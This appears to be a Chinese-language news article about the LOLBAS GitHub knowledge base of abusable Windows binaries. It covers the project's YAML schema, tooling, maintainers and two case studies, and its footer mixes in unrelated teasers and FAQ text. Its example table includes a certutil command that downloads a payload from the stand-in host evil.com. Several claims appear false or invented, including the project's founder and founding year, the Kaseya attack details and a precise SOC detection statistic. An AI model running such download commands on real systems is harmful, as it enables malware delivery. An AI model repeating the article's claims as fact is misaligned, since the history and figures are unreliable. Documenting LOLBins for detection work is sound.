LOLBAS项目:黑客的“就地取材”武器库,攻防双方必争的数据金矿

GitHub May 2026
⭐ 8553
来源:GitHub归档:May 2026
LOLBAS项目已成为Windows系统上“Living Off The Land”二进制文件与脚本的权威知识库。本文深入剖析其技术架构、社区生态,并阐释它为何能成为进攻性安全与企业检测工程共同依赖的基础数据源。

LOLBAS(Living Off The Land Binaries And Scripts)项目托管于GitHub的`lolbas-project/lolbas`仓库,是一个由社区驱动的权威知识库,系统收录了可被攻击者滥用以绕过安全控制的Windows原生二进制文件、脚本和库文件。该项目已获得超过8500颗星,从一个小众参考资源演变为红队、蓝队和检测工程师的关键工具。它详细记录了每个二进制文件的能力,包括执行方法、命令行参数以及MITRE ATT&CK映射。其结构化的YAML格式支持自动导入SIEM、EDR和威胁狩猎平台。然而,其仅限Windows的聚焦点以及对社区贡献的依赖,意味着部分条目可能过时。

技术深度剖析

LOLBAS仓库由一组YAML文件构成,每个文件代表一个二进制文件、脚本或库。其架构设计精良,兼顾人类可读性与机器解析能力。每个条目包含以下字段:

- Name:可执行文件或脚本名称(例如 `certutil.exe`、`powershell.exe`)
- Description:对滥用技术的简要说明
- Commands:一个或多个演示滥用方式的命令行调用
- Detection:检测该滥用的指导(例如Sysmon事件ID、ETW提供程序)
- Resources:指向外部参考、博客文章或研究论文的链接
- MITRE ATT&CK Mapping:直接链接到相关技术(例如T1218.011“签名二进制代理执行”)
- Author:提交该条目的贡献者

从工程角度看,YAML格式刻意保持简洁。它便于版本控制、自动化验证(通过CI/CD流水线),并能轻松集成到Sigma规则、YARA或自定义检测脚本等工具中。该项目维护了一个GitHub Actions工作流,在合并拉取请求之前对所有YAML文件进行lint检查并验证必填字段。

技术架构
- 存储:按类别(二进制文件、脚本、库)组织的扁平YAML文件
- 模式:由JSON模式验证器强制执行的必填和可选字段定义集
- API:无官方REST API,但可克隆原始GitHub仓库或通过GitHub的原始内容CDN访问
- 工具:已涌现多个第三方工具用于查询LOLBAS数据,包括`LOLBAS-Explorer`(一个拥有1.2k星标的Python CLI工具)和`LOLBAS-API`(社区构建的REST封装器)

数据表:LOLBAS条目结构示例
| 字段 | 类型 | 必填 | 示例值 |
|---|---|---|---|
| Name | String | 是 | `certutil.exe` |
| Description | String | 是 | `Certutil可用于从远程服务器下载文件,绕过应用程序白名单。` |
| Commands | List | 是 | `[{"command": "certutil -urlcache -f http://evil.com/payload.exe payload.exe", "description": "下载文件"}]` |
| Detection | String | 否 | `Sysmon事件ID 1:certutil.exe以-urlcache参数启动` |
| MITRE ATT&CK | List | 是 | `[{"technique": "T1105", "name": "入口工具传输"}]` |
| Author | String | 是 | `@mattifestation` |

数据要点: 结构化的YAML格式是LOLBAS实用性的基石。它支持自动导入检测流水线,但缺乏官方API意味着第三方工具必须依赖抓取仓库,这可能导致数据滞后。

性能与覆盖范围:截至2026年5月,该仓库包含超过250个条目,涵盖二进制文件、脚本和库。最常被滥用的类别包括:
- 签名二进制文件(例如 `rundll32.exe`、`mshta.exe`)
- 脚本宿主(例如 `cscript.exe`、`wscript.exe`)
- 系统实用工具(例如 `bitsadmin.exe`、`certutil.exe`)

项目的社区驱动特性意味着新条目会定期添加,但审查过程可能较慢。2025年对拉取请求合并时间的分析显示,中位数为14天,部分请求甚至需要超过60天才能得到审查。

关键人物与案例研究

LOLBAS项目最初由安全研究员Matt Graeber(@mattifestation)于2016年创建,源于他早期在PowerShell滥用和“就地取材”技术方面的工作。该项目后来由核心团队接手维护,成员包括Oddvar Moe(@oddvarmoe)和Jimmy Bayne(@bohops),两人都是进攻性安全社区的知名人物。

案例研究1:2021年Kaseya供应链攻击
在Kaseya VSA勒索软件事件中,攻击者使用`certutil.exe`下载Cobalt Strike信标。LOLBAS中`certutil.exe`的条目早在数年前就已发布,但许多组织并未针对这一特定滥用行为实施检测规则。事后分析显示,只有23%的受访SOC拥有针对`certutil.exe -urlcache`的检测规则。这一案例凸显了知识库可用性与实际运营部署之间的关键差距。

案例研究2:微软对LOLBAS滥用的回应
微软采取了混合策略。一方面,他们为某些LOLBin添加了遥测(例如用于进程创建的事件ID 4688);另一方面,他们也弃用了部分工具(例如`mshta.exe`在Windows 11 24H2中默认被阻止)。然而,猫鼠游戏仍在继续:攻击者现在使用`regsvr32.exe`配合`.sct`文件,或使用`msbuild.exe`配合内联任务。

对比表:LOLBAS与替代知识库
| 特性 | LOLBAS | ATT&CK Navigator | Sigma规则 |
|---|---|---|---|
| 焦点 | 仅限Windows二进制文件 | 所有平台,所有技术 | 检测规则(Sigma格式) |
| 格式 | YAML | JSON/Excel | YAML |
| 社区 | 开源,基于PR | MITRE主导,社区有限 | 开源,基于PR |
| 自动化 | 是 | 是 | 是 |

更多来自 GitHub

一统天下:AI-Setup如何终结AI编程工具配置碎片化开源项目caliber-ai-org/ai-setup迅速走红,上线一天内GitHub星标数突破1000,暴露出AI辅助开发领域一个深层次的需求缺口。该工具直击核心痛点:使用多个AI编程助手(如Claude Code、Cursor和CodeAWS FPGA SDK:云端加速的隐藏宝石,还是小众利器?aws/aws-fpga 仓库是 AWS 官方开源的 FPGA 加速应用开发与部署工具包,专为 EC2 F1 实例设计。它提供了硬件开发套件(HDK)和软件开发套件(SDK),封装了 Xilinx FPGA 工具链,使开发者能够为金融风险建Vidi记录回放:AWS FPGA开发中缺失的调试利器efeslab/aws-fpga仓库,作为官方AWS FPGA硬件开发工具包(aws/aws-fpga)的一个分支,引入了Vidi:一套记录回放支持系统,旨在简化FPGA设计与验证中众所周知的调试难题。通过捕获并回放硬件状态,Vidi使工程查看来源专题页GitHub 已收录 2069 篇文章

时间归档

May 20262270 篇已发布文章

延伸阅读

Hack-SQL:安全专家必备的SQLite渗透测试速查手册一个名为Hack-SQL的GitHub仓库,将40多种渗透测试工具的命令打包进一个可离线搜索的SQLite数据库。设计虽巧妙,但缺乏更新和静态内容,让红队和CTF参赛者对其长期价值产生疑问。Malwoverview:重塑安全运维的命令行威胁狩猎利器在碎片化的网络威胁情报世界中,安全分析师正被海量浏览器标签页淹没。Malwoverview 应运而生,它通过统一的命令行界面,可同时查询超过 18 个情报源。这款工具代表了向自动化优先安全流程的重大转变,有望极大加速初始威胁评估与狩猎行动。Koadic无文件恶意软件框架暴露Windows安全缺口,现代渗透测试迎来范式转移开源后渗透框架Koadic通过武器化Windows原生组件,实现高度隐蔽的无文件攻击。其持久化与规避能力不仅代表了攻击性安全测试的范式革新,更暴露出企业Windows环境中系统性的安全脆弱性。一统天下:AI-Setup如何终结AI编程工具配置碎片化一款名为ai-setup的开源工具横空出世,宣称能用一条命令终结AI编程助手的配置碎片化。它通过同步MCP、技能文件和配置文件,在Claude Code、Cursor和Codex之间实现统一管理,旨在为个人和团队打造流畅的多工具开发环境。

常见问题

GitHub 热点“LOLBAS Project: The Hacker's Playbook for Living Off the Land Binaries”主要讲了什么?

The LOLBAS (Living Off The Land Binaries And Scripts) project, hosted on GitHub under the lolbas-project/lolbas repository, is an authoritative, community-driven knowledge base cat…

这个 GitHub 项目在“LOLBAS project detection engineering best practices”上为什么会引发关注?

The LOLBAS repository is structured as a collection of YAML files, each representing a single binary, script, or library. The schema is meticulously designed for both human readability and machine parsing. Each entry inc…

从“LOLBins vs LOLScripts difference explained”看,这个 GitHub 项目的热度表现如何?

当前相关 GitHub 项目总星标约为 8553,近一日增长约为 0,这说明它在开源社区具有较强讨论度和扩散能力。